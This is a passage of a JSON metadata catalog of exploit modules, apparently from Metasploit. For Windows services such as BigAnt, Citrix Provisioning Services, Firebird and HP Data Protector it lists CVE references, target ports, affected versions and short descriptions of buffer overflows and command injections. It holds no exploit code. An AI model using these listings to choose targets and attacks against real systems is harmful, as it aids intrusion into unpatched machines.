"type": "exploit",
"author": [
"Hamburgers Maccoy",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This exploits a stack buffer overflow in BigAnt Server 2.97 SP7. The\n vulnerability is due to the dangerous usage of strcpy while handling errors. This\n module uses a combination of SCH and DUPF request to trigger the vulnerability, and\n has been tested successfully against version 2.97 SP7 over Windows XP SP3 and\n Windows 2003 SP2.",
"references": [
"CVE-2012-6275",
"US-CERT-VU-990652",
"BID-57214",
"OSVDB-89344"
],
"platform": "Windows",
"arch": "",
"rport": 6661,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BigAnt Server 2.97 SP7 / Windows XP SP3",
"BigAnt Server 2.97 SP7 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/bigant_server_sch_dupf_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/bigant_server_usv": {
"name": "BigAnt Server 2.52 USV Buffer Overflow",
"full_name": "exploit/windows/misc/bigant_server_usv",
"rank": 500,
"disclosure_date": "2009-12-29",
"type": "exploit",
"author": [
"Lincoln",
"DouBle_Zer0",
"jduck <jduck@metasploit.com>"
],
"description": "This exploits a stack buffer overflow in the BigAnt Messaging Service,\n part of the BigAnt Server product suite. This module was tested\n successfully against version 2.52.\n\n NOTE: The AntServer service does not restart, you only get one shot.",
"references": [
"CVE-2009-4660",
"OSVDB-61386",
"EDB-10765",
"EDB-10973"
],
"platform": "Windows",
"arch": "",
"rport": 6660,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BigAnt 2.52 Universal"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/misc/bigant_server_usv.rb",
"is_install_path": true,
"ref_name": "windows/misc/bigant_server_usv",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/bomberclone_overflow": {
"name": "Bomberclone 0.11.6 Buffer Overflow",
"full_name": "exploit/windows/misc/bomberclone_overflow",
"rank": 200,
"disclosure_date": "2006-02-16",
"type": "exploit",
"author": [
"Jacopo Cervini <acaro@jervus.it>"
],
"description": "This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows.\n The return address is overwritten with lstrcpyA memory address,\n the second and third value are the destination buffer,\n the fourth value is the source address of our buffer in the stack.\n This exploit is like a return in libc.\n\n ATTENTION\n The shellcode is exec ONLY when someone try to close bomberclone.",
"references": [
"CVE-2006-0460",
"OSVDB-23263",
"BID-16697"
],
"platform": "Windows",
"arch": "",
"rport": 11000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP SP2 Italian",
"Windows 2000 SP1 English",
"Windows 2000 SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/bomberclone_overflow.rb",
"is_install_path": true,
"ref_name": "windows/misc/bomberclone_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/bopup_comm": {
"name": "Bopup Communications Server Buffer Overflow",
"full_name": "exploit/windows/misc/bopup_comm",
"rank": 400,
"disclosure_date": "2009-06-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Bopup Communications Server 3.2.26.5460.\n By sending a specially crafted packet, an attacker may be\n able to execute arbitrary code.",
"references": [
"CVE-2009-2227",
"OSVDB-55275",
"URL-http://www.blabsoft.com/products/server",
"EDB-9002"
],
"platform": "Windows",
"arch": "",
"rport": 19810,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Bopup Communications Server 3.2.26.5460"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/bopup_comm.rb",
"is_install_path": true,
"ref_name": "windows/misc/bopup_comm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/borland_interbase": {
"name": "Borland Interbase Create-Request Buffer Overflow",
"full_name": "exploit/windows/misc/borland_interbase",
"rank": 200,
"disclosure_date": "2007-07-24",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Borland Interbase 2007.\n By sending a specially crafted create-request packet, a remote\n attacker may be able to execute arbitrary code.",
"references": [
"CVE-2007-3566",
"OSVDB-38602",
"URL-http://dvlabs.tippingpoint.com/advisory/TPTI-07-13"
],
"platform": "Windows",
"arch": "",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 English All / Borland InterBase 2007"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/borland_interbase.rb",
"is_install_path": true,
"ref_name": "windows/misc/borland_interbase",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/borland_starteam": {
"name": "Borland CaliberRM StarTeam Multicast Service Buffer Overflow",
"full_name": "exploit/windows/misc/borland_starteam",
"rank": 200,
"disclosure_date": "2008-04-02",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Borland CaliberRM 2006. By sending\n a specially crafted GET request to the STMulticastService, an attacker may be\n able to execute arbitrary code.",
"references": [
"CVE-2008-0311",
"OSVDB-44039",
"BID-28602"
],
"platform": "Windows",
"arch": "",
"rport": 3057,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2000 SP4 English",
"Windows 2003 SP0 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/borland_starteam.rb",
"is_install_path": true,
"ref_name": "windows/misc/borland_starteam",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/citrix_streamprocess": {
"name": "Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow",
"full_name": "exploit/windows/misc/citrix_streamprocess",
"rank": 400,
"disclosure_date": "2011-01-20",
"type": "exploit",
"author": [
"mog"
],
"description": "This module exploits a stack buffer overflow in Citrix Provisioning Services 5.6.\n By sending a specially crafted packet to the Provisioning Services server, a fixed\n length buffer on the stack can be overflowed and arbitrary code can be executed.",
"references": [
"OSVDB-70597",
"ZDI-11-023",
"URL-http://secunia.com/advisories/42954/",
"URL-http://support.citrix.com/article/CTX127149"
],
"platform": "Windows",
"arch": "",
"rport": 6905,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 / Windows Server 2003 SP2 / Windows Vista"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/citrix_streamprocess.rb",
"is_install_path": true,
"ref_name": "windows/misc/citrix_streamprocess",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/citrix_streamprocess_data_msg": {
"name": "Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow",
"full_name": "exploit/windows/misc/citrix_streamprocess_data_msg",
"rank": 300,
"disclosure_date": "2011-11-04",
"type": "exploit",
"author": [
"AbdulAziz Hariri",
"alino <26alino@gmail.com>"
],
"description": "This module exploits a remote buffer overflow in the Citrix Provisioning Services\n 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet to the\n 6905/UDP port. The module has been successfully tested on Windows Server 2003 SP2,\n Windows 7, and Windows XP SP3.",
"references": [
"OSVDB-75780",
"BID-49803",
"ZDI-12-009",
"URL-http://support.citrix.com/article/CTX130846"
],
"platform": "Windows",
"arch": "",
"rport": 6905,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Citrix Provisioning Services 5.6 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb",
"is_install_path": true,
"ref_name": "windows/misc/citrix_streamprocess_data_msg",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/citrix_streamprocess_get_boot_record_request": {
"name": "Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020004 Buffer Overflow",
"full_name": "exploit/windows/misc/citrix_streamprocess_get_boot_record_request",
"rank": 300,
"disclosure_date": "2011-11-04",
"type": "exploit",
"author": [
"alino <26alino@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote buffer overflow in the Citrix Provisioning Services\n 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode\n 0x40020004 (GetBootRecordRequest) to the 6905/UDP port. The module, which allows\n code execution under the context of SYSTEM, has been successfully tested on Windows Server\n 2003 SP2 and Windows XP SP3.",
"references": [
"OSVDB-75780",
"BID-49803",
"URL-http://support.citrix.com/article/CTX130846"
],
"platform": "Windows",
"arch": "",
"rport": 6905,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Citrix Provisioning Services 5.6 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb",
"is_install_path": true,
"ref_name": "windows/misc/citrix_streamprocess_get_boot_record_request",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/citrix_streamprocess_get_footer": {
"name": "Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020002 Buffer Overflow",
"full_name": "exploit/windows/misc/citrix_streamprocess_get_footer",
"rank": 300,
"disclosure_date": "2011-11-04",
"type": "exploit",
"author": [
"alino <26alino@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote buffer overflow in the Citrix Provisioning Services\n 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode\n 0x40020002 (GetFooterRequest) to the 6905/UDP port. The module, which allows code execution\n under the context of SYSTEM, has been successfully tested on Windows Server 2003 SP2\n and Windows XP SP3.",
"references": [
"OSVDB-75780",
"BID-49803",
"URL-http://support.citrix.com/article/CTX130846"
],
"platform": "Windows",
"arch": "",
"rport": 6905,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Citrix Provisioning Services 5.6 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb",
"is_install_path": true,
"ref_name": "windows/misc/citrix_streamprocess_get_footer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/citrix_streamprocess_get_objects": {
"name": "Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020006 Buffer Overflow",
"full_name": "exploit/windows/misc/citrix_streamprocess_get_objects",
"rank": 300,
"disclosure_date": "2011-11-04",
"type": "exploit",
"author": [
"Anyway <Aniway.Anyway@gmail.com>",
"alino <26alino@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote buffer overflow in the Citrix Provisioning Services\n 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode\n 0x40020006 (GetObjetsRequest) to the 6905/UDP port. The module, which allows code execution\n under the context of SYSTEM, has been successfully tested on Windows Server 2003 SP2\n and Windows XP SP3.",
"references": [
"OSVDB-75780",
"BID-49803",
"URL-http://support.citrix.com/article/CTX130846",
"ZDI-12-010"
],
"platform": "Windows",
"arch": "",
"rport": 6905,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Citrix Provisioning Services 5.6 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb",
"is_install_path": true,
"ref_name": "windows/misc/citrix_streamprocess_get_objects",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/cloudme_sync": {
"name": "CloudMe Sync v1.10.9",
"full_name": "exploit/windows/misc/cloudme_sync",
"rank": 500,
"disclosure_date": "2018-01-17",
"type": "exploit",
"author": [
"hyp3rlinx",
"Daniel Teixeira"
],
"description": "This module exploits a stack-based buffer overflow vulnerability\n in CloudMe Sync v1.10.9 client application. This module has been\n tested successfully on Windows 7 SP1 x86.",
"references": [
"CVE-2018-6892",
"EDB-44027"
],
"platform": "Windows",
"arch": "",
"rport": 8888,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"CloudMe Sync v1.10.9"
],
"mod_time": "2018-02-20 17:40:33 +0000",
"path": "/modules/exploits/windows/misc/cloudme_sync.rb",
"is_install_path": true,
"ref_name": "windows/misc/cloudme_sync",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/commvault_cmd_exec": {
"name": "Commvault Communications Service (cvd) Command Injection",
"full_name": "exploit/windows/misc/commvault_cmd_exec",
"rank": 400,
"disclosure_date": "2017-12-12",
"type": "exploit",
"author": [
"b0yd"
],
"description": "This module exploits a command injection vulnerability\n discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5\n and v10). The vulnerability exists in the cvd.exe service and allows an\n attacker to execute arbitrary commands in the context of the service. By\n default, the Commvault Communications service installs and runs as SYSTEM in\n Windows and does not require authentication. This vulnerability was discovered\n in the Windows version. The Linux version wasn't tested.",
"references": [
"CVE-2017-18044",
"URL-https://www.securifera.com/advisories/sec-2017-0001/"
],
"platform": "Windows",
"arch": "",
"rport": 8400,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Commvault Communications Service (cvd) / Microsoft Windows 7 and higher"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/misc/commvault_cmd_exec.rb",
"is_install_path": true,
"ref_name": "windows/misc/commvault_cmd_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/disk_savvy_adm": {
"name": "Disk Savvy Enterprise v10.4.18",
"full_name": "exploit/windows/misc/disk_savvy_adm",
"rank": 500,
"disclosure_date": "2017-01-31",
"type": "exploit",
"author": [
"Daniel Teixeira"
],
"description": "This module exploits a stack-based buffer overflow vulnerability\n in Disk Savvy Enterprise v10.4.18, caused by improper bounds\n checking of the request sent to the built-in server. This module\n has been tested successfully on Windows 7 SP1 x86.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": 9124,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Disk Savvy Enterprise v10.4.18"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/misc/disk_savvy_adm.rb",
"is_install_path": true,
"ref_name": "windows/misc/disk_savvy_adm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/doubletake": {
"name": "DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow",
"full_name": "exploit/windows/misc/doubletake",
"rank": 200,
"disclosure_date": "2008-06-04",
"type": "exploit",
"author": [
"ri0t <ri0t@ri0tnet.net>"
],
"description": "This module exploits a stack buffer overflow in the authentication mechanism of\n NSI Doubletake which is also rebranded as HP Storage Works. This vulnerability\n was found by Titon of Bastard Labs.",
"references": [
"CVE-2008-1661",
"OSVDB-45924"
],
"platform": "Windows",
"arch": "",
"rport": 1100,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"doubletake 4.5.0",
"doubletake 4.4.2",
"doubletake 4.5.0.1819"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/doubletake.rb",
"is_install_path": true,
"ref_name": "windows/misc/doubletake",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/eiqnetworks_esa": {
"name": "eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow",
"full_name": "exploit/windows/misc/eiqnetworks_esa",
"rank": 200,
"disclosure_date": "2006-07-24",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"ri0t <ri0t@ri0tnet.net>",
"kf <kf_list@digitalmunition.com>"
],
"description": "This module exploits a stack buffer overflow in eIQnetworks\n Enterprise Security Analyzer. During the processing of\n long arguments to the LICMGR_ADDLICENSE command, a stack-based\n buffer overflow occurs. This module has only been tested\n against ESA v2.1.13.",
"references": [
"CVE-2006-3838",
"OSVDB-27526",
"BID-19163",
"ZDI-06-024"
],
"platform": "Windows",
"arch": "",
"rport": 10616,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"EnterpriseSecurityAnalyzerv21 Universal",
"EiQ Enterprise Security Analyzer Offset 494 Windows 2000 SP0-SP4 English",
"EiQ Enterprise Security Analyzer Offset 494 Windows XP English SP1/SP2",
"EiQ Enterprise Security Analyzer Offset 494 Windows Server 2003 SP0/SP1",
"Astaro Report Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English",
"Astaro Report Manager (OEM) Offset 1262 Windows XP English SP1/SP2",
"Astaro Report Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1",
"Fortinet FortiReporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English",
"Fortinet FortiReporter (OEM) Offset 1262 Windows XP English SP1/SP2",
"Fortinet FortiReporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1",
"iPolicy Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English",
"iPolicy Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2",
"iPolicy Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1",
"SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English",
"SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows XP English SP1/SP2",
"SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1",
"Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English",
"Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2",
"Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1",
"Top Layer Network Security Analyzer (OEM) Offset 1262 Windows 2000 SP0-SP4 English",
"Top Layer Network Security Analyzer (OEM) Offset 1262 Windows XP English SP1/SP2",
"Top Layer Network Security Analyzer (OEM) Offset 1262 Windows Server 2003 English SP0/SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/eiqnetworks_esa.rb",
"is_install_path": true,
"ref_name": "windows/misc/eiqnetworks_esa",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/eiqnetworks_esa_topology": {
"name": "eIQNetworks ESA Topology DELETEDEVICE Overflow",
"full_name": "exploit/windows/misc/eiqnetworks_esa_topology",
"rank": 200,
"disclosure_date": "2006-07-25",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in eIQnetworks\n Enterprise Security Analyzer. During the processing of\n long arguments to the DELETEDEVICE command in the Topology\n server, a stack-based buffer overflow occurs.\n\n This module has only been tested against ESA v2.1.13.",
"references": [
"CVE-2006-3838",
"OSVDB-27528",
"BID-19164"
],
"platform": "Windows",
"arch": "",
"rport": 10628,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 SP4 English",
"Windows XP SP2 English",
"Windows 2003 SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb",
"is_install_path": true,
"ref_name": "windows/misc/eiqnetworks_esa_topology",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/enterasys_netsight_syslog_bof": {
"name": "Enterasys NetSight nssyslogd.exe Buffer Overflow",
"full_name": "exploit/windows/misc/enterasys_netsight_syslog_bof",
"rank": 300,
"disclosure_date": "2011-12-19",
"type": "exploit",
"author": [
"Jeremy Brown",
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Enterasys NetSight. The\n vulnerability exists in the Syslog service (nssylogd.exe) when parsing a specially\n crafted PRIO from a syslog message. The module has been tested successfully on\n Enterasys NetSight 4.0.1.34 over Windows XP SP3 and Windows 2003 SP2.",
"references": [
"CVE-2011-5227",
"OSVDB-77971",
"BID-51124",
"ZDI-11-350"
],
"platform": "Windows",
"arch": "",
"rport": 514,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Enterasys NetSight 4.0.1.34 / Windows XP SP3",
"Enterasys NetSight 4.0.1.34 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/enterasys_netsight_syslog_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/eureka_mail_err": {
"name": "Eureka Email 2.2q ERR Remote Buffer Overflow",
"full_name": "exploit/windows/misc/eureka_mail_err",
"rank": 300,
"disclosure_date": "2009-10-22",
"type": "exploit",
"author": [
"Francis Provencher (Protek Research Labs)",
"Dr_IDE",
"dookie",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer overflow in the Eureka Email 2.2q\n client that is triggered through an excessively long ERR message.\n\n NOTE: this exploit isn't very reliable. Unfortunately reaching the\n vulnerable code can only be done when manually checking mail (Ctrl-M).\n Checking at startup will not reach the code targeted here.",
"references": [
"CVE-2009-3837",
"OSVDB-59262",
"EDB-10235"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Win XP SP3 English",
"Win XP SP2 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/eureka_mail_err.rb",
"is_install_path": true,
"ref_name": "windows/misc/eureka_mail_err",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/fb_cnct_group": {
"name": "Firebird Relational Database CNCT Group Number Buffer Overflow",
"full_name": "exploit/windows/misc/fb_cnct_group",
"rank": 300,
"disclosure_date": "2013-01-31",
"type": "exploit",
"author": [
"Spencer McIntyre"
],
"description": "This module exploits a vulnerability in Firebird SQL Server. A specially\n crafted packet can be sent which will overwrite a pointer allowing the attacker to\n control where data is read from. Shortly, following the controlled read, the\n pointer is called resulting in code execution.\n\n The vulnerability exists with a group number extracted from the CNCT information,\n which is sent by the client, and whose size is not properly checked.\n\n This module uses an existing call to memcpy, just prior to the vulnerable code,\n which allows a small amount of data to be written to the stack. A two-phases\n stack pivot allows to execute the ROP chain which ultimately is used to execute\n VirtualAlloc and bypass DEP.",
"references": [
"CVE-2013-2492",
"OSVDB-91044"
],
"platform": "Windows",
"arch": "x86",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows FB 2.5.2.26539",
"Windows FB 2.5.1.26351",
"Windows FB 2.1.5.18496",
"Windows FB 2.1.4.18393",
"Debug"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/misc/fb_cnct_group.rb",
"is_install_path": true,
"ref_name": "windows/misc/fb_cnct_group",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-service-restarts"
]
}
},
"exploit_windows/misc/fb_isc_attach_database": {
"name": "Firebird Relational Database isc_attach_database() Buffer Overflow",
"full_name": "exploit/windows/misc/fb_isc_attach_database",
"rank": 200,
"disclosure_date": "2007-10-03",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted create request.",
"references": [
"CVE-2007-5243",
"OSVDB-38607",
"BID-25917",
"URL-http://www.risesecurity.org/advisories/RISE-2007002.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Brute Force",
"Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)",
"Debug"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/fb_isc_attach_database.rb",
"is_install_path": true,
"ref_name": "windows/misc/fb_isc_attach_database",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/fb_isc_create_database": {
"name": "Firebird Relational Database isc_create_database() Buffer Overflow",
"full_name": "exploit/windows/misc/fb_isc_create_database",
"rank": 200,
"disclosure_date": "2007-10-03",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted create request.",
"references": [
"CVE-2007-5243",
"OSVDB-38606",
"BID-25917",
"URL-http://www.risesecurity.org/advisories/RISE-2007002.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Brute Force",
"Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)",
"Debug"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/fb_isc_create_database.rb",
"is_install_path": true,
"ref_name": "windows/misc/fb_isc_create_database",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/fb_svc_attach": {
"name": "Firebird Relational Database SVC_attach() Buffer Overflow",
"full_name": "exploit/windows/misc/fb_svc_attach",
"rank": 200,
"disclosure_date": "2007-10-03",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted service attach request.",
"references": [
"CVE-2007-5243",
"OSVDB-38605",
"BID-25917",
"URL-http://www.risesecurity.org/advisories/RISE-2007002.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Brute Force",
"Firebird WI-V1.5.3.4870 WI-V1.5.4.4910",
"Debug"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/fb_svc_attach.rb",
"is_install_path": true,
"ref_name": "windows/misc/fb_svc_attach",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/gh0st": {
"name": "Gh0st Client buffer Overflow",
"full_name": "exploit/windows/misc/gh0st",
"rank": 300,
"disclosure_date": "2017-07-27",
"type": "exploit",
"author": [
"Professor Plum"
],
"description": "This module exploits a Memory buffer overflow in the Gh0st client (C2 server)",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Gh0st Beta 3.6"
],
"mod_time": "2017-09-04 20:57:23 +0000",
"path": "/modules/exploits/windows/misc/gh0st.rb",
"is_install_path": true,
"ref_name": "windows/misc/gh0st",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/gimp_script_fu": {
"name": "GIMP script-fu Server Buffer Overflow",
"full_name": "exploit/windows/misc/gimp_script_fu",
"rank": 300,
"disclosure_date": "2012-05-18",
"type": "exploit",
"author": [
"Joseph Sheridan",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow in the script-fu server\n component on GIMP <= 2.6.12. By sending a specially crafted packet, an\n attacker may be able to achieve remote code execution under the context\n of the user.\n\n This module has been tested on GIMP for Windows from installers\n provided by Jernej Simoncic.",
"references": [
"CVE-2012-2763",
"OSVDB-82429",
"BID-53741",
"EDB-18956",
"URL-http://www.reactionpenetrationtesting.co.uk/advisories/scriptfu-buffer-overflow-GIMP-2.6.html"
],
"platform": "Windows",
"arch": "",
"rport": 10008,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"GIMP 2.6.10 (no DEP) / Windows XP SP3 / Windows 7 SP1",
"GIMP 2.6.1 (no DEP) / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/gimp_script_fu.rb",
"is_install_path": true,
"ref_name": "windows/misc/gimp_script_fu",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_dataprotector_cmd_exec": {
"name": "HP Data Protector 8.10 Remote Command Execution",
"full_name": "exploit/windows/misc/hp_dataprotector_cmd_exec",
"rank": 600,
"disclosure_date": "2014-11-02",
"type": "exploit",
"author": [
"Christian Ramirez",
"Henoch Barrera",
"Matthew Hall <hallm@sec-1.com>"
],
"description": "This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary\n commands can be executed by sending crafted requests with opcode 28 to the OmniInet\n service listening on the TCP/5555 port. Since there is a strict length limitation on\n the command, rundll32.exe is executed, and the payload is provided through a DLL by a\n fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on\n Windows 7 SP1.",
"references": [
"CVE-2014-2623",
"OSVDB-109069",
"EDB-34066",
"URL-https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818"
],
"platform": "Windows",
"arch": "",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP Data Protector 8.10 / Windows"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb",
"is_install_path": true,
"ref_name": "windows/misc/hp_dataprotector_cmd_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/hp_dataprotector_crs": {
"name": "HP Data Protector Cell Request Service Buffer Overflow",
"full_name": "exploit/windows/misc/hp_dataprotector_crs",
"rank": 300,
